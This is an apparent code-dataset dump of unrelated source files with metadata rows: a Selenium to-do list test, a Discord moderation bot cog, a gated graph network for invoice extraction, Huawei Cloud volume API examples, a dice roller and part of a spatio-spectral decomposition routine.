self.assertNotIn(user_1_test_strings[1], page_text)
# User #2 is a boring man named Ted. Ted wants to buy milk because
# he has nothing better to do. Get a hold of yourself Ted!
inputbox = self.browser.find_element_by_id('id_new_item')
inputbox.send_keys(user_2_test_strings[0])
# The user hits enter.
inputbox.send_keys(Keys.ENTER)
# User#2 gets his own URL.
user2_url = self.browser.current_url
self.assertRegex(user2_url, '/lists/.+')
self.assertNotEqual(user1_url, user2_url)
# Check if there is no trace of the previous list
page_text = self.browser.find_element_by_tag_name('body').text
self.assertNotIn(user_1_test_strings[0], page_text)
self.assertNotIn(user_1_test_strings[1], page_text)
# Check if we have User#2's stuff
self.check_for_row_in_list_table(user2_correct_strings[0])
# Ted snaps, quits his job and moves to the Peruvian jungle.
# He is happy there.
# The milks stays unbought.
# All is well.
#
def test_layout_and_styling(self):
# Caveman Zogg visits the homepage
self.browser.get(self.live_server_url)
self.browser.set_window_size(1024, 768)
# Caveman notices the input box is nicely centered
inputbox = self.browser.find_element_by_id('id_new_item')
## Should be on the middle of the screen (1024/2=512)
# with a variance +/- 5px. ##
self.assertAlmostEqual(
inputbox.location['x'] + inputbox.size['width'] / 2,
512,
delta=5
)
# Caveman enters "rock".
inputbox.send_keys('rock\n')
inputbox = self.browser.find_element_by_id('id_new_item')
self.assertAlmostEqual(
inputbox.location['x'] + inputbox.size['width'] / 2,
512,
delta=5
)
| 31.130137 | 81 | 0.738614 | 720 | 4,545 | 4.455556 | 0.288889 | 0.072007 | 0.042082 | 0.061721 | 0.418329 | 0.409289 | 0.402431 | 0.324813 | 0.302993 | 0.264027 | 0 | 0.017114 | 0.164356 | 4,545 | 145 | 82 | 31.344828 | 0.827541 | 0.312211 | 0 | 0.3625 | 0 | 0 | 0.093628 | 0 | 0 | 0 | 0 | 0 | 0.1625 | 1 | 0.0625 | false | 0 | 0.0625 | 0 | 0.1375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
774e392147c2efbc920f76f60f3cecfcdbfd8de5 | 4,701 | py | Python | cogs/moderation.py | pratishrai/doraemon | 5621074eac3305c9fa5182ee190d5dbb02151b6b | [
"MIT"
] | 12 | 2020-07-01T09:27:14.000Z | 2022-01-27T07:56:42.000Z | cogs/moderation.py | pratishrai/doraemon | 5621074eac3305c9fa5182ee190d5dbb02151b6b | [
"MIT"
] | 7 | 2020-10-01T17:24:27.000Z | 2022-01-03T11:01:57.000Z | cogs/moderation.py | programming-wizard/doraemon | 3441050d972b3a380f01d7a6d3faa21fa2eab785 | [
"MIT"
] | 1 | 2020-06-12T01:17:24.000Z | 2020-06-12T01:17:24.000Z | import discord
from discord.ext import commands
class Moderation(commands.Cog, name="Moderation"):
def __init__(self, client):
self.client = client
@commands.command(aliases=["c"])
@commands.has_permissions(manage_messages=True)
async def clear(self, ctx, amount=1):
await ctx.channel.purge(limit=amount, before=ctx.message)
await ctx.message.delete()
@commands.command(aliases=["yeet"])
@commands.has_permissions(kick_members=True)
async def kick(self, ctx, member: discord.Member, *, reason=None):
embed = discord.Embed(
title="Kicked",
colour=0x2859B8,
description=f"{member.mention} has been kicked.",
)
await member.kick(reason=reason)
await ctx.send(embed=embed)
@commands.command()
@commands.has_permissions(ban_members=True)
async def ban(self, ctx, member: discord.Member, *, reason=None):
embed = discord.Embed(
title="Banned",
colour=0x2859B8,
description=f"{member.mention} has been banned.",
)
await member.ban(reason=reason)
await ctx.send(embed=embed)
@commands.command()
@commands.has_permissions(ban_members=True)
async def unban(self, ctx, *, member):
banned_users = await ctx.guild.bans()
member_name, member_discriminator = member.split("#")
for ban_entry in banned_users:
user = ban_entry.user
if (user.name, user.discriminator) == (member_name, member_discriminator):
await ctx.guild.unban(user)
embed = discord.Embed(
title="Banned",
colour=0x2859B8,
description=f"{user.mention} has been unbanned.",
)
await ctx.send(embed=embed)
return
embed = discord.Embed(
title="None", colour=0x2859B8, description=f"No such user was found banned."
)
await ctx.send(embed=embed)
@commands.command()
async def info(self, ctx, member: discord.Member = None):
async with ctx.channel.typing():
member = ctx.author if not member else member
roles = [role for role in member.roles]
embed = discord.Embed(color=member.color, timestamp=ctx.message.created_at)
embed.set_author(name=f"User Info - {member}")
embed.set_thumbnail(url=member.avatar_url)
embed.set_footer(
text=f"Requested by {ctx.author}", icon_url=ctx.author.avatar_url
)
embed.add_field(name="ID:", value=member.id)
embed.add_field(name="Name:", value=member.display_name)
embed.add_field(
name=f"Created at:",
value=member.created_at.strftime("%a, %#d %B %Y, %I:%M %p UTC"),
)
embed.add_field(
name=f"Joined at:",
value=member.joined_at.strftime("%a, %#d %B %Y, %I:%M %p UTC"),
)
embed.add_field(
name=f"Roles({len(roles)})",
value=" ".join([role.mention for role in roles]),
)
embed.add_field(name="Top role: ", value=member.top_role.mention)
embed.add_field(name="Bot? ", value=member.bot)
await ctx.send(embed=embed)
@commands.command(aliases=["sinfo"])
async def serverinfo(self, ctx):
async with ctx.channel.typing():
embed = discord.Embed(color=0x2859B8, timestamp=ctx.message.created_at)
embed.set_author(name=f"Guild Info - {ctx.guild}")
embed.set_thumbnail(url=ctx.guild.icon_url)
embed.set_footer(
text=f"Requested by {ctx.author}", icon_url=ctx.author.avatar_url
)
embed.add_field(name="ID:", value=ctx.guild.id)
embed.add_field(name="Owner:", value=ctx.guild.owner)
embed.add_field(
name=f"Created at:",
value=ctx.guild.created_at.strftime("%a, %#d %B %Y, %I:%M %p UTC"),
)
embed.add_field(name=f"Region:", value=ctx.guild.region)
embed.add_field(
name=f"Verification Level", value=ctx.guild.verification_level
)
embed.add_field(name="Members", value=len(ctx.guild.members))
embed.add_field(name="Channels", value=len(ctx.guild.channels))
embed.add_field(name="Emojis", value=len(ctx.guild.emojis))
embed.add_field(name="Roles", value=len(ctx.guild.roles))
await ctx.send(embed=embed)
def setup(client):
client.add_cog(Moderation(client))
| 37.608 | 88 | 0.583706 | 565 | 4,701 | 4.755752 | 0.20708 | 0.047637 | 0.07741 | 0.101228 | 0.436174 | 0.370674 | 0.370674 | 0.343134 | 0.294753 | 0.262747 | 0 | 0.00927 | 0.288662 | 4,701 | 124 | 89 | 37.91129 | 0.794258 | 0 | 0 | 0.317308 | 0 | 0 | 0.102531 | 0 | 0 | 0 | 0.008509 | 0 | 0 | 1 | 0.019231 | false | 0 | 0.019231 | 0 | 0.057692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
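# Usage sketch (token and extension path are placeholders; on discord.py 2.x, load_extension is a
# coroutine and commands.Bot() also requires an intents argument):
# bot = commands.Bot(command_prefix="!")
# bot.load_extension("cogs.moderation")
# bot.run("YOUR_BOT_TOKEN")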
774f86d02aa10f5aa07fe37feeabc706964b1a91 | 10,274 | py | Python | models/kie/gated_gcn.py | huyhoang17/KIE_invoice_minimal | 72b8469195e68c83e7ee373a551bb6dd00cabc7e | [
"MIT"
] | 17 | 2021-11-08T09:39:32.000Z | 2022-03-15T02:14:40.000Z | models/kie/gated_gcn.py | chuongnvk54/KIE_invoice_minimal | c8282818b9bf0699a1656dede9a26d5babaefabc | [
"MIT"
] | 1 | 2021-11-11T15:36:36.000Z | 2021-11-15T07:44:58.000Z | models/kie/gated_gcn.py | chuongnvk54/KIE_invoice_minimal | c8282818b9bf0699a1656dede9a26d5babaefabc | [
"MIT"
] | 2 | 2022-01-18T07:10:45.000Z | 2022-02-25T09:37:49.000Z | import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn import LSTM
from torch.nn.utils.rnn import pack_padded_sequence
import numpy as np
from models.kie.graph_norm import GraphNorm
"""
ResGatedGCN: Residual Gated Graph ConvNets
An Experimental Study of Neural Networks for Variable Graphs (Xavier Bresson and Thomas Laurent, ICLR 2018)
https://arxiv.org/pdf/1711.07553v2.pdf
"""
class MLPReadout(nn.Module):
def __init__(self, input_dim, output_dim, L=2): # L=nb_hidden_layers
super().__init__()
list_FC_layers = [
nn.Linear(input_dim // 2 ** l, input_dim // 2 ** (l + 1), bias=True)
for l in range(L)
]
list_FC_layers.append(nn.Linear(input_dim // 2 ** L, output_dim, bias=True))
self.FC_layers = nn.ModuleList(list_FC_layers)
self.L = L
def forward(self, x):
y = x
for l in range(self.L):
y = self.FC_layers[l](y)
y = F.relu(y)
y = self.FC_layers[self.L](y)
return y
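# e.g. MLPReadout(input_dim=256, output_dim=5) with the default L=2 maps 256 -> 128 -> 64 -> 5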
class GatedGCNLayer(nn.Module):
"""
Param: []
"""
def __init__(
self, input_dim, output_dim, dropout, graph_norm, batch_norm, residual=False
):
super().__init__()
self.in_channels = input_dim
self.out_channels = output_dim
self.dropout = dropout
self.graph_norm = graph_norm
self.batch_norm = batch_norm
self.residual = residual
if input_dim != output_dim:
self.residual = False
self.A = nn.Linear(input_dim, output_dim, bias=True)
self.B = nn.Linear(input_dim, output_dim, bias=True)
self.C = nn.Linear(input_dim, output_dim, bias=True)
self.D = nn.Linear(input_dim, output_dim, bias=True)
self.E = nn.Linear(input_dim, output_dim, bias=True)
self.bn_node_h = GraphNorm(output_dim)
self.bn_node_e = GraphNorm(output_dim)
def message_func(self, edges):
Bh_j = edges.src["Bh"]
e_ij = (
edges.data["Ce"] + edges.src["Dh"] + edges.dst["Eh"]
) # e_ij = Ce_ij + Dhi + Ehj
edges.data["e"] = e_ij
return {"Bh_j": Bh_j, "e_ij": e_ij}
def reduce_func(self, nodes):
Ah_i = nodes.data["Ah"]
Bh_j = nodes.mailbox["Bh_j"]
e = nodes.mailbox["e_ij"]
sigma_ij = torch.sigmoid(e) # sigma_ij = sigmoid(e_ij)
# h = Ah_i + torch.mean( sigma_ij * Bh_j, dim=1 ) # hi = Ahi + mean_j alpha_ij * Bhj
h = Ah_i + torch.sum(sigma_ij * Bh_j, dim=1) / (
torch.sum(sigma_ij, dim=1) + 1e-6
) # hi = Ahi + sum_j eta_ij/sum_j' eta_ij' * Bhj <= dense attention
return {"h": h}
def forward(self, g, h, e, snorm_n, snorm_e, graph_node_size, graph_edge_size):
h_in = h # for residual connection
e_in = e # for residual connection
g.ndata["h"] = h
g.ndata["Ah"] = self.A(h)
g.ndata["Bh"] = self.B(h)
g.ndata["Dh"] = self.D(h)
g.ndata["Eh"] = self.E(h)
g.edata["e"] = e
g.edata["Ce"] = self.C(e)
g.update_all(self.message_func, self.reduce_func)
h = g.ndata["h"] # result of graph convolution
e = g.edata["e"] # result of graph convolution
if self.graph_norm:
h = h * snorm_n # normalize activation w.r.t. graph size
e = e * snorm_e # normalize activation w.r.t. graph size
if self.batch_norm:
h = self.bn_node_h(h, graph_node_size) # graph normalization
e = self.bn_node_e(e, graph_edge_size) # graph normalization
h = F.relu(h) # non-linear activation
e = F.relu(e) # non-linear activation
if self.residual:
h = h_in + h # residual connection
e = e_in + e # residual connection
h = F.dropout(h, self.dropout, training=self.training)
e = F.dropout(e, self.dropout, training=self.training)
return h, e
def __repr__(self):
return "{}(in_channels={}, out_channels={})".format(
self.__class__.__name__, self.in_channels, self.out_channels
)
class DenseLayer(nn.Module):
def __init__(self, in_dim, out_dim):
super().__init__()
# self.bn = nn.BatchNorm1d(in_dim)
self.bn = nn.LayerNorm(in_dim)
self.linear = nn.Linear(in_dim, out_dim)
def forward(self, feat):
feat = self.bn(feat)
feat = F.relu(feat)
feat = self.linear(feat)
return feat
class GatedGCNNet(nn.Module):
def __init__(self, net_params):
super().__init__()
in_dim_text = net_params["in_dim_text"]
in_dim_node = net_params["in_dim_node"] # node_dim (feat is an integer)
in_dim_edge = net_params["in_dim_edge"] # edge_dim (feat is a float)
hidden_dim = net_params["hidden_dim"]
n_classes = net_params["n_classes"]
dropout = net_params["dropout"]
n_layers = net_params["L"]
self.ohem = net_params["OHEM"]
self.readout = net_params["readout"]
self.graph_norm = net_params["graph_norm"]
self.batch_norm = net_params["batch_norm"]
self.residual = net_params["residual"]
self.n_classes = n_classes
self.device = net_params["device"]
self.embedding_text = nn.Embedding(
in_dim_text, hidden_dim
) # text tokens are integer indices into a vocabulary of size in_dim_text
self.embedding_h = nn.Linear(in_dim_node, hidden_dim) # node features are float vectors
self.embedding_e = nn.Linear(in_dim_edge, hidden_dim) # edge features are float vectors
self.layers = nn.ModuleList(
[
GatedGCNLayer(
hidden_dim,
hidden_dim,
dropout,
self.graph_norm,
self.batch_norm,
self.residual,
)
for _ in range(n_layers)
]
)
self.dense_layers = nn.ModuleList(
[
DenseLayer(hidden_dim + i * hidden_dim, hidden_dim)
for i in range(1, n_layers + 1)
]
)
self.lstm = LSTM(
input_size=hidden_dim,
hidden_size=hidden_dim,
num_layers=1,
batch_first=True,
bidirectional=True,
)
self.MLP_layer = MLPReadout(hidden_dim, n_classes)
self.criterion = nn.CrossEntropyLoss(ignore_index=-100)
def lstm_text_embeding(self, text, text_length):
# FIXED
packed_sequence = pack_padded_sequence(
text, text_length.cpu(), batch_first=True, enforce_sorted=False
)
# packed_sequence = packed_sequence.to("cuda")
outputs_packed, (h_last, c_last) = self.lstm(packed_sequence)
# outputs, _ = pad_packed_sequence(outputs_packed)
return h_last.mean(0)
def clamp(self):
min = torch.tensor(0.0).cuda()
with torch.no_grad():
for m in self.modules():
# NOTE: UnifiedNorm is not imported in this file; clamp() assumes it is defined elsewhere
if isinstance(m, UnifiedNorm):
m.lambda_batch.masked_fill_(m.lambda_batch < 0, min)
m.lambda_graph.masked_fill_(m.lambda_graph < 0, min)
m.lambda_adja.masked_fill_(m.lambda_adja < 0, min)
m.lambda_node.masked_fill_(m.lambda_node < 0, min)
def concat(self, h_list, l):
h_concat = torch.cat(h_list, dim=1)
h = self.dense_layers[l](h_concat)
return h
def forward(
self,
g,
h,
e,
text,
text_length,
snorm_n,
snorm_e,
graph_node_size,
graph_edge_size,
):
# input embedding
h_embeding = self.embedding_h(h)
e_embeding = self.embedding_e(e)
# FIXED
text_embeding = self.embedding_text(text.long())
text_embeding = self.lstm_text_embeding(text_embeding, text_length)
text_embeding = F.normalize(text_embeding)
e = e_embeding
h = h_embeding + text_embeding
all_h = [h]
for i, conv in enumerate(self.layers):
h1, e = conv(g, h, e, snorm_n, snorm_e, graph_node_size, graph_edge_size)
all_h.append(h1)
h = self.concat(all_h, i)
# output
h_out = self.MLP_layer(h)
return h_out
def _ohem(self, pred, label):
# import pdb; pdb.set_trace()
pred = pred.data.cpu().numpy()
label = label.data.cpu().numpy()
pos_num = sum(label != 0)
neg_num = pos_num * self.ohem
pred_value = pred[:, 1:].max(1)
neg_score_sorted = np.sort(-pred_value[label == 0])
if neg_score_sorted.shape[0] > neg_num:
threshold = -neg_score_sorted[neg_num - 1]
mask = (pred_value >= threshold) | (label != 0)
else:
mask = label != -1
return torch.from_numpy(mask)
def loss(self, pred, label):
mask_label = label.clone()
mask = self._ohem(pred, label)
mask = mask.to(pred.device)
mask_label[mask == False] = -100
loss = self.criterion(pred, mask_label)
# calculating label weights for weighted loss computation
# V = label.size(0)
# label_count = torch.bincount(label)
# label_count = label_count[label_count.nonzero()].squeeze()
# cluster_sizes = torch.zeros(self.n_classes).long().to(self.device)
# cluster_sizes[torch.unique(label)] = label_count
# weight = (V - cluster_sizes).float() / V
# weight *= (cluster_sizes>0).float()
# # weighted cross-entropy for unbalanced classes
# criterion = nn.CrossEntropyLoss(weight=weight)
# loss = criterion(pred, label)
return loss
if __name__ == "__main__":
    net_params = {}
    # example values; the in_dim_* and "OHEM" keys are required by GatedGCNNet.__init__
    net_params["in_dim_text"] = 256  # text vocabulary size
    net_params["in_dim_node"] = 8    # node feature dimension
    net_params["in_dim_edge"] = 2    # edge feature dimension
    net_params["hidden_dim"] = 256
    net_params["out_dim"] = 256
    net_params["n_classes"] = 5
    net_params["in_feat_dropout"] = 0.1
    net_params["dropout"] = 0.1
    net_params["L"] = 5
    net_params["OHEM"] = 3  # negative-to-positive ratio for online hard example mining
    net_params["readout"] = True
    net_params["graph_norm"] = True
    net_params["batch_norm"] = True
    net_params["residual"] = True
    net_params["device"] = "cuda"
    net = GatedGCNNet(net_params)
    print(net)
| 32.206897 | 111 | 0.580008 | 1,390 | 10,274 | 4.020863 | 0.17554 | 0.045089 | 0.020039 | 0.024334 | 0.144749 | 0.103417 | 0.091966 | 0.064949 | 0.054571 | 0.021471 | 0 | 0.00939 | 0.305529 | 10,274 | 318 | 112 | 32.308176 | 0.773931 | 0.129453 | 0 | 0.034483 | 0 | 0 | 0.033422 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.068966 | false | 0 | 0.030172 | 0.00431 | 0.163793 | 0.00431 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
7750932a0118ae42185cc09da01e6d0df4656352 | 468 | py | Python | study_algorithm/python/Recursion/permute.py | AlphaSunny/study | 4e65127fefa9078b7ae6b9db92369c93e61e4327 | [
"MIT"
] | null | null | null | study_algorithm/python/Recursion/permute.py | AlphaSunny/study | 4e65127fefa9078b7ae6b9db92369c93e61e4327 | [
"MIT"
] | null | null | null | study_algorithm/python/Recursion/permute.py | AlphaSunny/study | 4e65127fefa9078b7ae6b9db92369c93e61e4327 | [
"MIT"
] | null | null | null | def permute(s):
out = []
# Base Case
if len(s) == 1:
out = [s]
else:
# For every letter in string
for i, let in enumerate(s):
# For every permutation resulting from Step 2 and 3 described above
for perm in permute(s[:i] + s[i+1:]):
# Add it to output
out += [let + perm]
return out
permute('abc') | 21.272727 | 80 | 0.418803 | 55 | 468 | 3.563636 | 0.618182 | 0.081633 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016736 | 0.489316 | 468 | 22 | 81 | 21.272727 | 0.803347 | 0.254274 | 0 | 0 | 0 | 0 | 0.009259 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
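# Example: permute('abc') returns ['abc', 'acb', 'bac', 'bca', 'cab', 'cba']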
7750a9d478d94ac8bcc4800eb6dad04bf18e970a | 386 | py | Python | molsysmt/_private/digestion/viewers.py | uibcdf/MolModMTs | 4f6b6f671a9fa3e73008d1e9c48686d5f20a6573 | [
"MIT"
] | null | null | null | molsysmt/_private/digestion/viewers.py | uibcdf/MolModMTs | 4f6b6f671a9fa3e73008d1e9c48686d5f20a6573 | [
"MIT"
] | null | null | null | molsysmt/_private/digestion/viewers.py | uibcdf/MolModMTs | 4f6b6f671a9fa3e73008d1e9c48686d5f20a6573 | [
"MIT"
] | null | null | null | from ..exceptions import *
viewers_forms = {
    'NGLView': 'nglview.NGLWidget',
}

viewer_from_lowercase = {ii.lower(): ii for ii in viewers_forms}

def digest_viewer(viewer):
    try:
        tmp_viewer = viewer_from_lowercase[viewer.lower()]
        tmp_viewer_form = viewers_forms[tmp_viewer]
        return tmp_viewer, tmp_viewer_form
    except:
        # any lookup failure means the requested viewer is not supported
        raise BadCallError()
| 21.444444 | 65 | 0.686528 | 47 | 386 | 5.319149 | 0.468085 | 0.18 | 0.152 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.217617 | 386 | 17 | 66 | 22.705882 | 0.827815 | 0 | 0 | 0 | 0 | 0 | 0.062338 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.083333 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
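# Example: digest_viewer("nglview") returns ('NGLView', 'nglview.NGLWidget')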
77518d24dd92a2a87d6fe37aa0005290be04a5ec | 4,884 | py | Python | examples/block_store/v2/volume.py | wangrui1121/huaweicloud-sdk-python | 240abe00288760115d1791012d4e3c4592d77ad1 | [
"Apache-2.0"
] | 43 | 2018-12-19T08:39:15.000Z | 2021-07-21T02:45:43.000Z | examples/block_store/v2/volume.py | wangrui1121/huaweicloud-sdk-python | 240abe00288760115d1791012d4e3c4592d77ad1 | [
"Apache-2.0"
] | 11 | 2019-03-17T13:28:56.000Z | 2020-09-23T23:57:50.000Z | examples/block_store/v2/volume.py | wangrui1121/huaweicloud-sdk-python | 240abe00288760115d1791012d4e3c4592d77ad1 | [
"Apache-2.0"
] | 47 | 2018-12-19T05:14:25.000Z | 2022-03-19T15:28:30.000Z | # -*- coding:utf-8 -*-
# Copyright 2019 Huawei Technologies Co.,Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use
# this file except in compliance with the License. You may obtain a copy of the
# License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
import os
from openstack import connection
# create connection
username = "xxxxxx"
password = os.getenv('get_secret_code')
projectId = "xxxxxxxxxxxxxxxxxxxxxxxxxxxx" # tenant ID
userDomainId = "xxxxxxxxxxxxxxxxxxxxxxxxxxxx" # user account ID
auth_url = "xxxxxxxxxxxxxxxxxxxxxxxxxxxx" # endpoint url
conn = connection.Connection(auth_url=auth_url,
user_domain_id=userDomainId,
project_id=projectId,
username=username,
password=password)
# create volume
def create_volume():
data = {
"name": "volume_name",
"availability_zone": "xxx",
"description": "volume_description",
"volume_type": "SATA",
"metadata": {
"__system__encrypted": "0"
},
"size": 10
}
volume = conn.block_store.create_volume(**data)
print(volume)
# create volume by dss
def create_volume_by_dss():
data = {
"volume": {
"name": "volume_name",
"availability_zone": "az1.dc1",
"description": "volume_description",
"volume_type": "SAS",
"size": 100,
"metadata": {},
},
"OS-SCH-HNT:scheduler_hints": {
"dedicated_storage_id": "xxx"
}
}
volume = conn.block_store.create_volume_by_dss(**data)
print(volume)
# delete volume
def delete_volume():
volume_id = "xxx"
conn.block_store.delete_volume(volume_id)
# update volume
def update_volume():
volume_id = 'xxx'
data = {
"name": "volume-name"
}
print(conn.block_store.update_volume(volume_id, **data))
# expand volume
def expand_volume():
volume_id = 'xxx'
new_size = 18
new_vloume = conn.block_store.expand_volume(volume_id, new_size)
print(new_vloume)
# volumes
def volumes():
for index in conn.block_store.volumes(details=False):
print(index)
# list volumes with paginated
def list_volumes_one_page():
for index in conn.block_store.volumes(paginated=False, limit=3):
print(index)
# get volume
def get_volume():
volume_id = 'xxx'
volume = conn.block_store.get_volume(volume_id)
print(volume)
# get quota set
def get_quota_set():
print(conn.block_store.get_quota_set(projectId))
# create volume metadata
def create_volume_metadata():
volume_id = 'xxx'
data = {
"metadata": {
"k1": "v1",
"k11": "v11",
"k111": "v111"
}
}
volume_metadata = conn.block_store.create_volume_metadata(volume_id, **data)
print(volume_metadata)
# get volume metadata
def get_volume_metadata():
volume_id = 'xxx'
volume_metadata = conn.block_store.get_volume_metadata(volume_id, key=None)
print(volume_metadata)
# update volume metadata
def update_volume_metadata():
volume_id = 'xxx'
data_all = {
"metadata": {
"k1": "v1"
}
}
volume_metadata = conn.block_store.update_volume_metadata(volume_id, key=None, **data_all)
print(volume_metadata)
# delete volume metadata
def delete_volume_metadata():
volume_id = 'xxx'
volume_metadata = conn.block_store.delete_volume_metadata(volume_id, key='delete_key')
print(volume_metadata)
# set volume bootable
def set_volume_bootable():
volume_id = 'xxx'
bootable = conn.block_store.set_volume_bootable(volume_id, True)
print(bootable)
# set volume readonly
def set_volume_readonly():
volume_id = 'xxx'
readonly = conn.block_store.set_volume_readonly(volume_id, True)
print(readonly)
# export image by volume
def export_image_by_volume():
volume_id = 'xxx'
data = {
"image_name": "make_a_image_from_volume"
}
image = conn.block_store.export_image_by_volume(volume_id, **data)
print(image)
if __name__ == '__main__':
create_volume()
create_volume_by_dss()
delete_volume()
update_volume()
expand_volume()
volumes()
list_volumes_one_page()
get_volume()
get_quota_set()
create_volume_metadata()
get_volume_metadata()
update_volume_metadata()
delete_volume_metadata()
set_volume_bootable()
set_volume_readonly()
export_image_by_volume()
| 24.918367 | 94 | 0.658272 | 592 | 4,884 | 5.143581 | 0.266892 | 0.110345 | 0.073563 | 0.0578 | 0.419704 | 0.141872 | 0.055172 | 0.034811 | 0.034811 | 0.034811 | 0 | 0.00913 | 0.23751 | 4,884 | 195 | 95 | 25.046154 | 0.808539 | 0.191441 | 0 | 0.244094 | 0 | 0 | 0.12848 | 0.034227 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125984 | false | 0.015748 | 0.015748 | 0 | 0.141732 | 0.11811 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
7751953cc00999a4b9be0030e55184f50f57f424 | 418 | py | Python | main.py | Z4RD0Z/dice_thrower | 860d30691531287730f46028267b32e98a641402 | [
"MIT"
] | null | null | null | main.py | Z4RD0Z/dice_thrower | 860d30691531287730f46028267b32e98a641402 | [
"MIT"
] | null | null | null | main.py | Z4RD0Z/dice_thrower | 860d30691531287730f46028267b32e98a641402 | [
"MIT"
] | null | null | null | from dice_throwers import DiceThrowerFactory
from cli import type_list
import inquirer
ready = True
game_type = inquirer.prompt(type_list)
print(game_type)
dice_thrower = DiceThrowerFactory.create_thrower(game_type['game'])
while ready:
    dice = input("roll-> ")
    if dice == "exit" or dice == "EXIT":
        ready = False
        continue  # do not try to parse the exit command as a dice expression
    result = dice_thrower.parse_dice_string(dice.strip())
    print(result)
| 22 | 67 | 0.722488 | 55 | 418 | 5.290909 | 0.490909 | 0.082474 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.172249 | 418 | 18 | 68 | 23.222222 | 0.84104 | 0 | 0 | 0 | 0 | 0 | 0.045455 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.230769 | 0 | 0.230769 | 0.153846 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
77529d71c1cfb907519a888e4c2d97fd82c94b61 | 6,237 | py | Python | code/ssd.py | ryanhammonds/ieeg-spatial-filters-ssd | a58eb13ec1b73a7ec74d3ba5f038bddcf27d8147 | [
"MIT"
] | 14 | 2021-03-01T07:25:12.000Z | 2021-12-15T20:43:34.000Z | code/ssd.py | ryanhammonds/ieeg-spatial-filters-ssd | a58eb13ec1b73a7ec74d3ba5f038bddcf27d8147 | [
"MIT"
] | null | null | null | code/ssd.py | ryanhammonds/ieeg-spatial-filters-ssd | a58eb13ec1b73a7ec74d3ba5f038bddcf27d8147 | [
"MIT"
] | 5 | 2021-03-01T07:25:01.000Z | 2021-06-06T10:03:33.000Z | """ Functions to compute Spatial-Spectral Decompostion (SSD).
Reference
---------
Nikulin VV, Nolte G, Curio G.: A novel method for reliable and fast
extraction of neuronal EEG/MEG oscillations on the basis of
spatio-spectral decomposition. Neuroimage. 2011 Apr 15;55(4):1528-35.
doi: 10.1016/j.neuroimage.2011.01.057. Epub 2011 Jan 27. PMID: 21276858.
"""
import numpy as np
from scipy.linalg import eig
import mne
def compute_ged(cov_signal, cov_noise):
"""Compute a generatlized eigenvalue decomposition maximizing principal
directions spanned by the signal contribution while minimizing directions
spanned by the noise contribution.
Parameters
----------
cov_signal : array, 2-D
Covariance matrix of the signal contribution.
cov_noise : array, 2-D
Covariance matrix of the noise contribution.
Returns
-------
filters : array
SSD spatial filter matrix, columns are individual filters.
"""
nr_channels = cov_signal.shape[0]
# check for rank-deficiency
[lambda_val, filters] = eig(cov_signal)
idx = np.argsort(lambda_val)[::-1]
filters = np.real(filters[:, idx])
lambda_val = np.real(lambda_val[idx])
tol = lambda_val[0] * 1e-6
r = np.sum(lambda_val > tol)
# if rank smaller than nr_channels make expansion
if r < nr_channels:
print("Warning: Input data is not full rank")
M = np.matmul(filters[:, :r], np.diag(lambda_val[:r] ** -0.5))
else:
M = np.diag(np.ones((nr_channels,)))
cov_signal_ex = (M.T @ cov_signal) @ M
cov_noise_ex = (M.T @ cov_noise) @ M
[lambda_val, filters] = eig(cov_signal_ex, cov_signal_ex + cov_noise_ex)
# eigenvalues should be sorted by size already, but double checking
idx = np.argsort(lambda_val)[::-1]
filters = filters[:, idx]
